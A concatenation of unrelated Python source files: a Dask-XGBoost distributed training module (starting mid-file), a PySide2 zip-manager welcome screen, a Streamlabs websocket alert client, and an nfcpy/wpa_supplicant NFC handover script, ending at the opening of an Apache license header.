if isinstance(label_parts, np.ndarray):
assert label_parts.ndim == 1 or label_parts.shape[1] == 1
label_parts = label_parts.flatten().tolist()
# Arrange parts into pairs. This enforces co-locality
parts = list(map(delayed, zip(data_parts, label_parts)))
parts = client.compute(parts) # Start computation in the background
yield wait(parts)
for part in parts:
if part.status == "error":
yield part # trigger error locally
# Because XGBoost-python doesn't yet allow iterative training, we need to
# find the locations of all chunks and map them to particular Dask workers
key_to_part_dict = dict([(part.key, part) for part in parts])
who_has = yield client.scheduler.who_has(keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[first(workers)].append(key_to_part_dict[key])
ncores = yield client.scheduler.ncores() # Number of cores per worker
# Start the XGBoost tracker on the Dask scheduler
host, port = parse_host_port(client.scheduler.address)
env = yield client._run_on_scheduler(
start_tracker, host.strip("/:"), len(worker_map)
)
# Tell each worker to train on the chunks/parts that it has locally
futures = [
client.submit(
train_part,
env,
assoc(params, "nthread", ncores[worker]),
list_of_parts,
workers=worker,
dmatrix_kwargs=dmatrix_kwargs,
**kwargs
)
for worker, list_of_parts in worker_map.items()
]
# Get the results, only one will be non-None
results = yield client._gather(futures)
result = [v for v in results if v][0]
num_class = params.get("num_class")
if num_class:
result.set_attr(num_class=str(num_class))
raise gen.Return(result)
def train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
""" Train an XGBoost model on a Dask Cluster
This starts XGBoost on all Dask workers, moves input data to those workers,
and then calls ``xgboost.train`` on the inputs.
Parameters
----------
client: dask.distributed.Client
params: dict
Parameters to give to XGBoost (see xgb.Booster.train)
data: dask array or dask.dataframe
labels: dask.array or dask.dataframe
dmatrix_kwargs: Keywords to give to Xgboost DMatrix
**kwargs: Keywords to give to XGBoost train
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> data = dd.read_csv('s3://...') # doctest: +SKIP
>>> labels = data['outcome'] # doctest: +SKIP
>>> del data['outcome'] # doctest: +SKIP
>>> train(client, params, data, labels, **normal_kwargs) # doctest: +SKIP
<xgboost.core.Booster object at ...>
See Also
--------
predict
"""
return client.sync(
_train, client, params, data, labels, dmatrix_kwargs, **kwargs
)
def _predict_part(part, model=None):
xgb.rabit.init()
try:
dm = xgb.DMatrix(part)
result = model.predict(dm)
finally:
xgb.rabit.finalize()
if isinstance(part, pd.DataFrame):
if model.attr("num_class"):
result = pd.DataFrame(result, index=part.index)
else:
result = pd.Series(result, index=part.index, name="predictions")
return result
def predict(client, model, data):
""" Distributed prediction with XGBoost
Parameters
----------
client: dask.distributed.Client
model: xgboost.Booster
data: dask array or dataframe
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> test_data = dd.read_csv('s3://...') # doctest: +SKIP
>>> model
<xgboost.core.Booster object at ...>
>>> predictions = predict(client, model, test_data) # doctest: +SKIP
Returns
-------
Dask.dataframe or dask.array, depending on the input data type
See Also
--------
train
"""
if isinstance(data, dd._Frame):
result = data.map_partitions(_predict_part, model=model)
result = result.values
elif isinstance(data, da.Array):
num_class = model.attr("num_class") or 2
num_class = int(num_class)
if num_class > 2:
kwargs = dict(
drop_axis=None, chunks=(data.chunks[0], (num_class,))
)
else:
kwargs = dict(drop_axis=1)
result = data.map_blocks(
_predict_part, model=model, dtype=np.float32, **kwargs
)
return result
class XGBRegressor(xgb.XGBRegressor):
def fit(
self,
X,
y=None,
eval_set=None,
sample_weight_eval_set=None,
eval_metric=None,
early_stopping_rounds=None,
):
"""Fit the gradient boosting model
Parameters
----------
X : array-like [n_samples, n_features]
y : array-like
Returns
-------
self : the fitted Regressor
Notes
-----
This differs from the XGBoost version not supporting the ``eval_set``,
``eval_metric``, ``early_stopping_rounds`` and ``verbose`` fit
kwargs.
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of instance weights on the i-th validation set.
eval_metric : str, list of str, or callable, optional
If a str, should be a built-in evaluation metric to use. See
`doc/parameter.rst <https://github.com/dmlc/xgboost/blob/master/doc/parameter.rst>`_. # noqa: E501
If a list of str, should be the list of multiple built-in
evaluation metrics to use.
If callable, a custom evaluation metric. The call
signature is ``func(y_predicted, y_true)`` where ``y_true`` will
be a DMatrix object such that you may need to call the
``get_label`` method. It must return a str, value pair where
the str is a name for the evaluation and value is the value of
the evaluation function. The callable custom objective is always
minimized.
early_stopping_rounds : int
Activates early stopping. Validation metric needs to improve at
least once in every **early_stopping_rounds** round(s) to continue
training.
Requires at least one item in **eval_set**.
The method returns the model from the last iteration (not the best
one).
If there's more than one item in **eval_set**, the last entry will
be used for early stopping.
If there's more than one metric in **eval_metric**, the last
metric will be used for early stopping.
If early stopping occurs, the model will have three additional
fields:
``clf.best_score``, ``clf.best_iteration`` and
``clf.best_ntree_limit``.
"""
client = default_client()
xgb_options = self.get_xgb_params()
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
xgb_options.update({"eval_metric": eval_metric})
self._Booster = train(
client,
xgb_options,
X,
y,
num_boost_round=self.n_estimators,
eval_set=eval_set,
missing=self.missing,
n_jobs=self.n_jobs,
early_stopping_rounds=early_stopping_rounds,
)
if early_stopping_rounds is not None:
self.best_score = self._Booster.best_score
self.best_iteration = self._Booster.best_iteration
self.best_ntree_limit = self._Booster.best_ntree_limit
return self
def predict(self, X):
client = default_client()
return predict(client, self._Booster, X)
class XGBClassifier(xgb.XGBClassifier):
def fit(
self,
X,
y=None,
classes=None,
eval_set=None,
sample_weight_eval_set=None,
eval_metric=None,
early_stopping_rounds=None,
):
"""Fit a gradient boosting classifier
Parameters
----------
X : array-like [n_samples, n_features]
Feature Matrix. May be a dask.array or dask.dataframe
y : array-like
Labels
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of instance weights on the i-th validation set.
eval_metric : str, list of str, or callable, optional
If a str, should be a built-in evaluation metric to use. See
`doc/parameter.rst <https://github.com/dmlc/xgboost/blob/master/doc/parameter.rst>`_. # noqa: E501
If a list of str, should be the list of multiple built-in
evaluation metrics to use.
If callable, a custom evaluation metric. The call
signature is ``func(y_predicted, y_true)`` where ``y_true`` will
be a DMatrix object such that you may need to call the
``get_label`` method. It must return a str, value pair where
the str is a name for the evaluation and value is the value of
the evaluation function. The callable custom objective is always
minimized.
early_stopping_rounds : int
Activates early stopping. Validation metric needs to improve at
least once in every **early_stopping_rounds** round(s) to continue
training.
Requires at least one item in **eval_set**.
The method returns the model from the last iteration (not the best
one).
If there's more than one item in **eval_set**, the last entry will
be used for early stopping.
If there's more than one metric in **eval_metric**, the last
metric will be used for early stopping.
If early stopping occurs, the model will have three additional
fields:
``clf.best_score``, ``clf.best_iteration`` and
``clf.best_ntree_limit``.
classes : sequence, optional
The unique values in `y`. If no specified, this will be
eagerly computed from `y` before training.
Returns
-------
self : XGBClassifier
Notes
-----
This differs from the XGBoost version in three ways
1. The ``sample_weight`` and ``verbose`` fit kwargs are not
supported.
2. The labels are not automatically label-encoded
3. The ``classes_`` and ``n_classes_`` attributes are not learned
"""
client = default_client()
if classes is None:
if isinstance(y, da.Array):
classes = da.unique(y)
else:
classes = y.unique()
classes = classes.compute()
else:
classes = np.asarray(classes)
self.classes_ = classes
self.n_classes_ = len(self.classes_)
xgb_options = self.get_xgb_params()
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
xgb_options.update({"eval_metric": eval_metric})
if self.n_classes_ > 2:
# xgboost just ignores the user-provided objective
# We only overwrite if it's the default...
if xgb_options["objective"] == "binary:logistic":
xgb_options["objective"] = "multi:softprob"
xgb_options.setdefault("num_class", self.n_classes_)
# xgboost sets this to self.objective, which I think is wrong
# hyper-parameters should not be updated during fit.
self.objective = xgb_options["objective"]
# TODO: auto label-encode y
# that will require a dependency on dask-ml
# TODO: sample weight
self._Booster = train(
client,
xgb_options,
X,
y,
num_boost_round=self.n_estimators,
eval_set=eval_set,
missing=self.missing,
n_jobs=self.n_jobs,
early_stopping_rounds=early_stopping_rounds,
)
if early_stopping_rounds is not None:
self.best_score = self._Booster.best_score
self.best_iteration = self._Booster.best_iteration
self.best_ntree_limit = self._Booster.best_ntree_limit
return self
def predict(self, X):
client = default_client()
class_probs = predict(client, self._Booster, X)
if class_probs.ndim > 1:
cidx = da.argmax(class_probs, axis=1)
else:
cidx = (class_probs > 0).astype(np.int64)
return cidx
def predict_proba(self, data, ntree_limit=None):
client = default_client()
if ntree_limit is not None:
raise NotImplementedError(
"'ntree_limit' is not currently " "supported."
)
class_probs = predict(client, self._Booster, data)
return class_probs
|
Welcome.py
|
from PySide2 import QtWidgets, QtCore, QtGui
import PySide2
from Updater import checkForUpdates
from urllib.request import urlopen
from threading import Thread
from Tools import *
#from Tools import log, debugging, _platform, getFileIcon, getPath, openOnExplorer, notify, settings, version, openSettingsWindow
class Welcome(QtWidgets.QWidget):
loadPixmapSignal = QtCore.Signal(bytes)
def __init__(self, parent=None):
super().__init__(parent=parent)
self.compressButton = QtWidgets.QPushButton(self)
self.compressButton.clicked.connect(lambda: self.window().addCompressTab())
self.compressButton.resize(128, 128)
self.compressButton.setIcon(QtGui.QIcon(getPath("compressFiles.ico")))
self.compressButton.setIconSize(QtCore.QSize(96, 96))
self.extractButton = QtWidgets.QPushButton(self)
self.extractButton.clicked.connect(lambda: self.window().addExtractTab())
self.extractButton.setIcon(QtGui.QIcon(getPath("extractFiles.ico")))
self.extractButton.resize(128, 128)
self.extractButton.setIconSize(QtCore.QSize(96, 96))
self.infoLabel = QtWidgets.QLabel(self)
self.infoLabel.setText(f"SomePythonThings Zip Manager v{version} © 2021 The SomePythonThings Project")
self.checkForUpdatesButton = QtWidgets.QPushButton(self)
self.checkForUpdatesButton.setText("Check for updates...")
self.checkForUpdatesButton.setFixedWidth(150)
self.checkForUpdatesButton.setFixedHeight(25)
self.checkForUpdatesButton.clicked.connect(lambda: checkForUpdates(self.window(), verbose=True))
self.settingsButton = QtWidgets.QPushButton(self)
self.settingsButton.setText("Settings...")
self.settingsButton.clicked.connect(lambda: openSettingsWindow(self.window()))
self.settingsButton.setFixedHeight(25)
self.settingsButton.setFixedWidth(100)
self.compressLabel = QtWidgets.QLabel(self)
self.compressLabel.setText("Compress Files")
self.compressLabel.setAlignment(QtCore.Qt.AlignCenter)
self.compressLabel.resize(128, 25)
self.extractLabel = QtWidgets.QLabel(self)
self.extractLabel.setText("Extract Files")
self.extractLabel.setAlignment(QtCore.Qt.AlignCenter)
self.extractLabel.resize(128, 25)
self.bannerLabel = QtWidgets.QLabel()
#self.bannerLabel.resize(700, 200)
self.bannerLabel.setAlignment(QtCore.Qt.AlignCenter)
self.bannerLabel.setText("Welcome to SomePythonThings Zip Manager! We are now loading internet info...")
self.scrollLayout = QtWidgets.QGridLayout(self)
self.scrollLayout.addWidget(self.bannerLabel)
self.scrollabreArea = QtWidgets.QScrollArea(self)
self.scrollabreArea.setWidgetResizable(True)
self.scrollabreArea.setWidget(self.bannerLabel)
self.bannerLabel.resize(1000, 1000)
self.pixmap = QtGui.QPixmap()
self.resizeEvent()
self.loadPixmapSignal.connect(self.showPic)
Thread(target=self.loadPicThread, daemon=True).start()
def showPic(self, data) -> None:
log("[ OK ] Showing banner...")
self.pixmap.loadFromData(data)
self.resizeEvent()
def loadPicThread(self) -> None:
log("[ ] Downloading banner...")
url = 'https://raw.githubusercontent.com/martinet101/SomePythonThings-Zip-Manager/master/media/live_banner.png'
data = urlopen(url).read()
self.loadPixmapSignal.emit(data)
def loadEvent(self, ok: bool) -> None:
if(ok):
self.banner.show()
else:
self.bannerLabel.setText("Unable to load news page :(\n\n Please check your internet connection and try again")
def resizeEvent(self, event: QtGui.QResizeEvent = None) -> None:
if(event):
super().resizeEvent(event)
w = self.width()
h = self.height()
self.compressButton.move(w//2-133, h//2-14)
self.extractButton.move(w//2+5, h//2-14)
self.infoLabel.move(10, h-25)
self.infoLabel.resize(1500, 24)
#self.banner.move(50, 50)
#self.banner.resize(w-100, h//2-64-50)
self.bannerLabel.setPixmap(self.pixmap.scaledToWidth(self.scrollabreArea.width()-20, QtCore.Qt.SmoothTransformation))
self.bannerLabel.setFixedHeight(self.pixmap.scaledToWidth(self.scrollabreArea.width()).height())
self.scrollabreArea.move(50, 50)
self.scrollabreArea.resize(w-100, h//2-64-50)
self.settingsButton.move(w-105, 5)
self.checkForUpdatesButton.move(w-155, h-30)
self.extractLabel.move(w//2+5, h//2+124)
self.compressLabel.move(w//2-133, h//2+124)
if(__name__=="__main__"):
import __init__
|
streamlabs.py
|
import json
import requests
import websockets
import asyncio
import threading
import queue
import arrow
import traceback
class NoWebsocketToken(Exception):
pass
class StreamlabsAPI(object):
def __init__(self):
self._alertbox_url = None
self._websocket_token = None
self._websocket_data = queue.Queue()
self._ping_interval = 25
self._last_ping_response = None
self._thread = None # type: threading.Thread
self._disconnected_event = threading.Event()
self._disconnected_event.set()
self._connected_event = threading.Event()
self._connected_event.clear()
@property
def connected_event(self):
return self._connected_event
@property
def disconnected_event(self):
return self._disconnected_event
def get_websocket_token(self, alertbox_url):
self._alertbox_url = alertbox_url
self._websocket_token = self._get_websocket_token()
if not self._websocket_token:
raise NoWebsocketToken()
def launch(self):
if self._thread is None or not self._thread.is_alive():
self._launch_background_thread()
# self.read_from_msglog("/Users/jeremy/Downloads/msglog.txt")
def get_websocket_data_blocking(self, timeout=None):
return self._websocket_data.get(timeout=timeout)
def read_from_msglog(self, file_path):
with open(file_path, 'r') as f:
for line in f.readlines():
if line == "\n":
continue
else:
try:
json_data = json.loads(line)
except json.JSONDecodeError:
print("failed to decode json")
continue
self._websocket_data.put(json_data)
def _get_websocket_token(self):
try:
token = self._alertbox_url.split("/")[-1]
token_url = "https://streamlabs.com/api/v5/io/info?token=" + token
valid_headers = {
"Host": "streamlabs.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0",
"Referer": self._alertbox_url,
}
try:
req = requests.get(token_url, headers=valid_headers)
except requests.exceptions.ConnectionError:
return None
if req.status_code != 200:
return None
try:
req_parsed = json.loads(req.text)
except json.JSONDecodeError:
return None
websocket_token = req_parsed['path'].split("=")[-1]
except Exception as e:
traceback.print_exc()
return None
return websocket_token
def _launch_background_thread(self):
def loop_in_thread(asyncio_loop):
asyncio.set_event_loop(asyncio_loop)
asyncio_loop.run_until_complete(self._run())
loop = asyncio.get_event_loop()
self._thread = threading.Thread(target=loop_in_thread, args=(loop,), daemon=True)
self._thread.start()
async def _run(self):
ws_url = "wss://aws-io.streamlabs.com:443/socket.io/?token=%s&EIO=3&transport=websocket" % self._websocket_token
async with websockets.connect(ws_url) as websocket:
self._disconnected_event.clear()
self._connected_event.set()
self._last_ping_response = arrow.now()
keepalive_task = asyncio.ensure_future(self._keepalive(websocket))
read_data_task = asyncio.ensure_future(self._read_data(websocket))
done, pending = await asyncio.wait(
[keepalive_task, read_data_task],
return_when=asyncio.FIRST_COMPLETED
)
for task in pending:
task.cancel()
self._connected_event.clear()
self._disconnected_event.set()
async def _keepalive(self, socket):
while 1:
print("sending keepalive")
await socket.send("2")
await asyncio.sleep(3)
diff = arrow.now() - self._last_ping_response
if diff.total_seconds() > 5:
raise RuntimeError("Ping failed")
await asyncio.sleep(self._ping_interval-3)
async def _read_data(self, socket):
while 1:
data = await socket.recv()
data = data.strip()
number = ""
while data and data[0].isnumeric():
number += data[0]
data = data[1:]
if number == "3":
self._last_ping_response = arrow.now()
if data:
try:
parsed_data = json.loads(data)
except json.JSONDecodeError:
print("unknown packet encountered")
continue
print(parsed_data)
if 'pingInterval' in parsed_data:
self._ping_interval = int(parsed_data['pingInterval']) / 1000
else:
self._websocket_data.put(parsed_data)
|
p2p-nfc.py
|
#!/usr/bin/python
#
# Example nfcpy to wpa_supplicant wrapper for P2P NFC operations
# Copyright (c) 2012-2013, Jouni Malinen <[email protected]>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import os
import sys
import time
import random
import threading
import argparse
import nfc
import nfc.ndef
import nfc.llcp
import nfc.handover
import logging
import wpaspy
wpas_ctrl = '/var/run/wpa_supplicant'
ifname = None
init_on_touch = False
in_raw_mode = False
prev_tcgetattr = 0
include_wps_req = True
include_p2p_req = True
no_input = False
srv = None
continue_loop = True
terminate_now = False
summary_file = None
success_file = None
def summary(txt):
print(txt)
if summary_file:
with open(summary_file, 'a') as f:
f.write(txt + "\n")
def success_report(txt):
summary(txt)
if success_file:
with open(success_file, 'a') as f:
f.write(txt + "\n")
def wpas_connect():
ifaces = []
if os.path.isdir(wpas_ctrl):
try:
ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)]
except OSError as error:
print("Could not find wpa_supplicant: ", error)
return None
if len(ifaces) < 1:
print("No wpa_supplicant control interface found")
return None
for ctrl in ifaces:
if ifname:
if ifname not in ctrl:
continue
try:
print("Trying to use control interface " + ctrl)
wpas = wpaspy.Ctrl(ctrl)
return wpas
except Exception as e:
pass
return None
def wpas_tag_read(message):
wpas = wpas_connect()
if (wpas == None):
return False
cmd = "WPS_NFC_TAG_READ " + str(message).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
if "FAIL" in wpas.request(cmd):
return False
return True
def wpas_get_handover_req():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_req_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF WPS-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel(tag=False):
wpas = wpas_connect()
if (wpas == None):
return None
if tag:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR-TAG").rstrip()
else:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF WPS-CR");
if "FAIL" in res:
return None
return res.rstrip().decode("hex")
def wpas_report_handover(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " P2P " + str(req).encode("hex") + " " + str(sel).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def wpas_report_handover_wsc(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " WPS " + str(req).encode("hex") + " " + str(sel).encode("hex")
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def p2p_handover_client(llc):
message = nfc.ndef.HandoverRequestMessage(version="1.2")
message.nonce = random.randint(0, 0xffff)
global include_p2p_req
if include_p2p_req:
data = wpas_get_handover_req()
if (data == None):
summary("Could not get handover request carrier record from wpa_supplicant")
return
print("Handover request carrier record from wpa_supplicant: " + data.encode("hex"))
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
global include_wps_req
if include_wps_req:
print("Handover request (pre-WPS):")
try:
print(message.pretty())
except Exception as e:
print(e)
data = wpas_get_handover_req_wps()
if data:
print("Add WPS request in addition to P2P")
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
print("Handover request:")
try:
print(message.pretty())
except Exception as e:
print(e)
print(str(message).encode("hex"))
client = nfc.handover.HandoverClient(llc)
try:
summary("Trying to initiate NFC connection handover")
client.connect()
summary("Connected for handover")
except nfc.llcp.ConnectRefused:
summary("Handover connection refused")
client.close()
return
except Exception as e:
summary("Other exception: " + str(e))
client.close()
return
summary("Sending handover request")
if not client.send(message):
summary("Failed to send handover request")
client.close()
return
summary("Receiving handover response")
message = client._recv()
if message is None:
summary("No response received")
client.close()
return
if message.type != "urn:nfc:wkt:Hs":
summary("Response was not Hs - received: " + message.type)
client.close()
return
print("Received message")
try:
print(message.pretty())
except Exception as e:
print(e)
print(str(message).encode("hex"))
message = nfc.ndef.HandoverSelectMessage(message)
summary("Handover select received")
try:
print(message.pretty())
except Exception as e:
print(e)
for carrier in message.carriers:
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.p2p":
print("P2P carrier type match - send to wpa_supplicant")
if "OK" in wpas_report_handover(data, carrier.record, "INIT"):
success_report("P2P handover reported successfully (initiator)")
else:
summary("P2P handover report rejected")
break
print("Remove peer")
client.close()
print("Done with handover")
global only_one
if only_one:
print("only_one -> stop loop")
global continue_loop
continue_loop = False
global no_wait
if no_wait:
print("Trying to exit..")
global terminate_now
terminate_now = True
class HandoverServer(nfc.handover.HandoverServer):
def __init__(self, llc):
super(HandoverServer, self).__init__(llc)
self.sent_carrier = None
self.ho_server_processing = False
self.success = False
# override to avoid parser error in request/response.pretty() in nfcpy
# due to new WSC handover format
def _process_request(self, request):
summary("received handover request {}".format(request.type))
response = nfc.ndef.Message("\xd1\x02\x01Hs\x12")
if not request.type == 'urn:nfc:wkt:Hr':
summary("not a handover request")
else:
try:
request = nfc.ndef.HandoverRequestMessage(request)
except nfc.ndef.DecodeError as e:
summary("error decoding 'Hr' message: {}".format(e))
else:
response = self.process_request(request)
summary("send handover response {}".format(response.type))
return response
def process_request(self, request):
self.ho_server_processing = True
clear_raw_mode()
print("HandoverServer - request received")
try:
print("Parsed handover request: " + request.pretty())
except Exception as e:
print(e)
sel = nfc.ndef.HandoverSelectMessage(version="1.2")
found = False
for carrier in request.carriers:
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.p2p":
print("P2P carrier type match - add P2P carrier record")
found = True
self.received_carrier = carrier.record
print("Carrier record:")
try:
print(carrier.record.pretty())
except Exception as e:
print(e)
data = wpas_get_handover_sel()
if data is None:
print("Could not get handover select carrier record from wpa_supplicant")
continue
print("Handover select carrier record from wpa_supplicant:")
print(data.encode("hex"))
self.sent_carrier = data
if "OK" in wpas_report_handover(self.received_carrier, self.sent_carrier, "RESP"):
success_report("P2P handover reported successfully (responder)")
else:
summary("P2P handover report rejected")
break
message = nfc.ndef.Message(data);
sel.add_carrier(message[0], "active", message[1:])
break
for carrier in request.carriers:
if found:
break
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.wsc":
print("WSC carrier type match - add WSC carrier record")
found = True
self.received_carrier = carrier.record
print("Carrier record:")
try:
print(carrier.record.pretty())
except Exception as e:
print(e)
data = wpas_get_handover_sel_wps()
if data is None:
print("Could not get handover select carrier record from wpa_supplicant")
continue
print("Handover select carrier record from wpa_supplicant:")
print(data.encode("hex"))
self.sent_carrier = data
if "OK" in wpas_report_handover_wsc(self.received_carrier, self.sent_carrier, "RESP"):
success_report("WSC handover reported successfully")
else:
summary("WSC handover report rejected")
break
message = nfc.ndef.Message(data);
sel.add_carrier(message[0], "active", message[1:])
found = True
break
print("Handover select:")
try:
print(sel.pretty())
except Exception as e:
print(e)
print(str(sel).encode("hex"))
summary("Sending handover select")
self.success = True
return sel
def clear_raw_mode():
import sys, tty, termios
global prev_tcgetattr, in_raw_mode
if not in_raw_mode:
return
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
def getch():
import sys, tty, termios, select
global prev_tcgetattr, in_raw_mode
fd = sys.stdin.fileno()
prev_tcgetattr = termios.tcgetattr(fd)
ch = None
try:
tty.setraw(fd)
in_raw_mode = True
[i, o, e] = select.select([fd], [], [], 0.05)
if i:
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
return ch
def p2p_tag_read(tag):
success = False
if len(tag.ndef.message):
for record in tag.ndef.message:
print("record type " + record.type)
if record.type == "application/vnd.wfa.wsc":
summary("WPS tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
if record.type == "application/vnd.wfa.p2p":
summary("P2P tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
else:
summary("Empty tag")
if success:
success_report("Tag read succeeded")
return success
def rdwr_connected_p2p_write(tag):
summary("Tag found - writing - " + str(tag))
global p2p_sel_data
tag.ndef.message = str(p2p_sel_data)
success_report("Tag write succeeded")
print("Done - remove tag")
global only_one
if only_one:
global continue_loop
continue_loop = False
global p2p_sel_wait_remove
return p2p_sel_wait_remove
def wps_write_p2p_handover_sel(clf, wait_remove=True):
print("Write P2P handover select")
data = wpas_get_handover_sel(tag=True)
if (data == None):
summary("Could not get P2P handover select from wpa_supplicant")
return
global p2p_sel_wait_remove
p2p_sel_wait_remove = wait_remove
global p2p_sel_data
p2p_sel_data = nfc.ndef.HandoverSelectMessage(version="1.2")
message = nfc.ndef.Message(data);
p2p_sel_data.add_carrier(message[0], "active", message[1:])
print("Handover select:")
try:
print(p2p_sel_data.pretty())
except Exception as e:
print(e)
print(str(p2p_sel_data).encode("hex"))
print("Touch an NFC tag")
clf.connect(rdwr={'on-connect': rdwr_connected_p2p_write})
def rdwr_connected(tag):
global only_one, no_wait
summary("Tag connected: " + str(tag))
if tag.ndef:
print("NDEF tag: " + tag.type)
try:
print(tag.ndef.message.pretty())
except Exception as e:
print(e)
success = p2p_tag_read(tag)
if only_one and success:
global continue_loop
continue_loop = False
else:
summary("Not an NDEF tag - remove tag")
return True
return not no_wait
def llcp_worker(llc):
global init_on_touch
if init_on_touch:
print("Starting handover client")
p2p_handover_client(llc)
return
global no_input
if no_input:
print("Wait for handover to complete")
else:
print("Wait for handover to complete - press 'i' to initiate ('w' for WPS only, 'p' for P2P only)")
global srv
global wait_connection
while not wait_connection and srv.sent_carrier is None:
if srv.ho_server_processing:
time.sleep(0.025)
elif no_input:
time.sleep(0.5)
else:
global include_wps_req, include_p2p_req
res = getch()
if res == 'i':
include_wps_req = True
include_p2p_req = True
elif res == 'p':
include_wps_req = False
include_p2p_req = True
elif res == 'w':
include_wps_req = True
include_p2p_req = False
else:
continue
clear_raw_mode()
print("Starting handover client")
p2p_handover_client(llc)
return
clear_raw_mode()
print("Exiting llcp_worker thread")
def llcp_startup(clf, llc):
print("Start LLCP server")
global srv
srv = HandoverServer(llc)
return llc
def llcp_connected(llc):
print("P2P LLCP connected")
global wait_connection
wait_connection = False
global init_on_touch
if not init_on_touch:
global srv
srv.start()
if init_on_touch or not no_input:
threading.Thread(target=llcp_worker, args=(llc,)).start()
return True
def terminate_loop():
global terminate_now
return terminate_now
def main():
clf = nfc.ContactlessFrontend()
parser = argparse.ArgumentParser(description='nfcpy to wpa_supplicant integration for P2P and WPS NFC operations')
parser.add_argument('-d', const=logging.DEBUG, default=logging.INFO,
action='store_const', dest='loglevel',
help='verbose debug output')
parser.add_argument('-q', const=logging.WARNING, action='store_const',
dest='loglevel', help='be quiet')
parser.add_argument('--only-one', '-1', action='store_true',
help='run only one operation and exit')
parser.add_argument('--init-on-touch', '-I', action='store_true',
help='initiate handover on touch')
parser.add_argument('--no-wait', action='store_true',
help='do not wait for tag to be removed before exiting')
parser.add_argument('--ifname', '-i',
help='network interface name')
parser.add_argument('--no-wps-req', '-N', action='store_true',
help='do not include WPS carrier record in request')
parser.add_argument('--no-input', '-a', action='store_true',
help='do not use stdout input to initiate handover')
parser.add_argument('--tag-read-only', '-t', action='store_true',
help='tag read only (do not allow connection handover)')
parser.add_argument('--handover-only', action='store_true',
help='connection handover only (do not allow tag read)')
parser.add_argument('--freq', '-f',
help='forced frequency of operating channel in MHz')
parser.add_argument('--summary',
help='summary file for writing status updates')
parser.add_argument('--success',
help='success file for writing success update')
parser.add_argument('command', choices=['write-p2p-sel'],
nargs='?')
args = parser.parse_args()
global only_one
only_one = args.only_one
global no_wait
no_wait = args.no_wait
global force_freq
force_freq = args.freq
logging.basicConfig(level=args.loglevel)
global init_on_touch
init_on_touch = args.init_on_touch
if args.ifname:
global ifname
ifname = args.ifname
print("Selected ifname " + ifname)
if args.no_wps_req:
global include_wps_req
include_wps_req = False
if args.summary:
global summary_file
summary_file = args.summary
if args.success:
global success_file
success_file = args.success
if args.no_input:
global no_input
no_input = True
clf = nfc.ContactlessFrontend()
global wait_connection
try:
if not clf.open("usb"):
print("Could not open connection with an NFC device")
raise SystemExit
if args.command == "write-p2p-sel":
wps_write_p2p_handover_sel(clf, wait_remove=not args.no_wait)
raise SystemExit
global continue_loop
while continue_loop:
print("Waiting for a tag or peer to be touched")
wait_connection = True
try:
if args.tag_read_only:
if not clf.connect(rdwr={'on-connect': rdwr_connected}):
break
elif args.handover_only:
if not clf.connect(llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
else:
if not clf.connect(rdwr={'on-connect': rdwr_connected},
llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
except Exception as e:
print("clf.connect failed")
global srv
if only_one and srv and srv.success:
raise SystemExit
except KeyboardInterrupt:
raise SystemExit
finally:
clf.close()
raise SystemExit
if __name__ == '__main__':
main()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
